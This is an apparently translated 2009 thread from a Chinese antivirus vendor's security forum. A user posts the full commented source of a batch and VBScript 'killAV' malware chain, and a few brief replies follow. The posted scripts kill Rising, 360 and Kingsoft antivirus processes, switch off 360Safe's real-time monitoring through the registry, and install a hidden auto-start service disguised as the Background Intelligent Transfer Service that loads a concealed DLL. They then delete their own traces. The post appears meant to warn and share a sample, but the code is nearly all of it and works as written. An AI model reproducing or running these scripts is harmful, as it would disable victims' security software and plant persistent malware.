Rising Kaka Security Forum (瑞星卡卡安全论坛)

Another batch-file killAV malicious program found [code attached]
程序漏洞 - 2009-8-9 16:05:00


Here I got two .bat files and two .vbs files plus one kill.

  Source code follows:
  setdt.vbs source:
  ' Stage 1: launch setdt.bat without a visible window.
  ' vbhide is not a VBScript constant; the undefined name evaluates to Empty, which Run treats as 0 (hidden window).
  set Cleaner=createobject("wscript.shell")
  Cleaner.run "setdt.bat",vbhide
  .......
  setdt.bat source:
  @ECHO OFF
  REM Stage 2: save the current date, turn the clock back to 1988-09-18, run hide.vbs, then restore the date.
  @date /t>C:\time.txt
  date 1988-09-18
  hide.vbs
  @date <C:\time.txt
  REM Remove every dropped component, then this script itself (%0).
  del %SystemRoot%\system32\setdt.vbs
  del %SystemRoot%\system32\hide.vbs
  del %SystemRoot%\system32\command.exe
  del %SystemRoot%\system32\xKill.exe
  del %SystemRoot%\system32\xkill.bat
  del C:\time.txt
  del %0
  ..................
  hide.vbs source:
  ' Stage 3: after a 100 s delay run the process killer, then the service installer, then command.exe, all hidden.
  dim shell
  set shell=CreateObject("Wscript.Shell")
  WScript.Sleep 100000
  shell.run "cmd /c start %SystemRoot%\system32\xKill.exe",0
  set Cleaner=createobject("wscript.shell")
  Cleaner.run "xkill.bat",vbhide
  WScript.Sleep 100000
  shell.run "cmd /c start %SystemRoot%\system32\command.exe",0
  ......................
  xkill.bat source:
  @echo off
  REM Kill the Rising tray (rstray.exe) and 360 Safe (360tray.exe, 360safe.exe) processes.
  taskkill /f /im rstray.exe >NUL
  taskkill /f /im 360tray.exe >NUL
  taskkill /f /im 360safe.exe >NUL
  REM kill.reg: zero the 360Safe real-time monitor switches.
  echo Windows Registry Editor Version 5.00>>kill.reg
  echo [HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon]>>kill.reg
  echo "MonAccess"=dword:00000000>>kill.reg
  echo "SiteAccess"=dword:00000000>>kill.reg
  echo "ExecAccess"=dword:00000000>>kill.reg
  echo "UDiskAccess"=dword:00000000>>kill.reg
  echo "LeakShowed"=dword:00000000>>kill.reg
  REM Register a service named DARK, then rewrite its keys from dark.reg so it looks like a svchost-hosted BITS.
  sc create DARK binpath= %windir%\System32\darkkill.dll
  sc config DARK start= disabled
  echo Windows Registry Editor Version 5.00>>dark.reg
  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK]>>dark.reg
  REM Type 0x110 = SERVICE_WIN32_OWN_PROCESS plus SERVICE_INTERACTIVE_PROCESS; Start 2 = auto-start; ErrorControl 1 = normal.
  echo "Type"=dword:00000110>>dark.reg
  echo "Start"=dword:00000002>>dark.reg
  echo "ErrorControl"=dword:00000001>>dark.reg
  REM ImagePath (REG_EXPAND_SZ, UTF-16LE bytes) decodes to: %SystemRoot%\system32\svchost.exe -k netsvcs
  REM Nothing in this script adds DARK to the netsvcs group under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost.
  echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>dark.reg
  echo  74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\>>dark.reg
  echo  00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\>>dark.reg
  echo  6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00>>dark.reg
  REM The display name of the real BITS service is borrowed; DependOnService (REG_MULTI_SZ) decodes to RpcSs.
  echo "DisplayName"="Background Intelligent Transfer Service">>dark.reg
  echo "DependOnService"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00>>dark.reg
  echo "DependOnGroup"=hex(7):00,00>>dark.reg
  echo "ObjectName"="LocalSystem">>dark.reg
  echo "Description"=hex(2):00,00>>dark.reg
  REM A bare "echo" prints "ECHO is off." to the console and appends nothing to dark.reg; regedit does not need the blank line.
  echo
  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Parameters]>>dark.reg
  REM ServiceDll decodes to the hard-coded path C:\WINDOWS\system32\darkkill.dll
  echo "ServiceDll"=hex(2):43,00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,\>>dark.reg
  echo  00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,64,00,61,00,\>>dark.reg
  echo  72,00,6b,00,6b,00,69,00,6c,00,6c,00,2e,00,64,00,6c,00,6c,00,00,00>>dark.reg
  echo
  REM Security: a raw service security descriptor (REG_BINARY) written verbatim.
  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Security]>>dark.reg
  echo "Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\>>dark.reg
  echo  00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\>>dark.reg
  echo  00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\>>dark.reg
  echo  05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\>>dark.reg
  echo  20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\>>dark.reg
  echo  00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\>>dark.reg
  echo  00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00>>dark.reg
  echo
  REM Enum: mimics the Root\LEGACY_name\0000 instance entry the system creates for a legacy service.
  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Enum]>>dark.reg
  echo "0"="Root\\LEGACY_DARK\\0000">>dark.reg
  echo "Count"=dword:00000001>>dark.reg
  echo "NextInstance"=dword:00000001>>dark.reg
  REM Import both files, drop the DLL under System32 as darkkill.dll, start the service, hide the DLL, clean up.
  regedit /s dark.reg
  regedit /s kill.reg
  COPY dark.dll %windir%\System32\darkkill.dll
  sc config DARK start= AUTO
  net start DARK
  attrib %windir%\System32\darkkill.dll +s +h
  del kill.reg
  del dark.reg
  del dark.dll
  del dark.exe
  REM Run the process killer once more, kill Kingsoft (kav.exe), then delete this script.
  xkill.exe
  taskkill /f /im kav.exe >NUL
  del %0

Source: http://hi.baidu.com/yffeng/blog/item/73b222235ae78fa34723e83e.html
Running xkill.exe directly can terminate Rising, NOD32 and Kingsoft.
On virscan.org only AVG flags it, as KILLAV.

sinoer - 2009-8-9 17:12:00
OP, if you have suspicious files, you can submit the samples in a follow-up post.
程序漏洞 - 2009-8-9 17:36:00
This hardly counts as a sample; users can make .bat files themselves.
Palkia - 2009-8-9 18:56:00
This is stuff from January...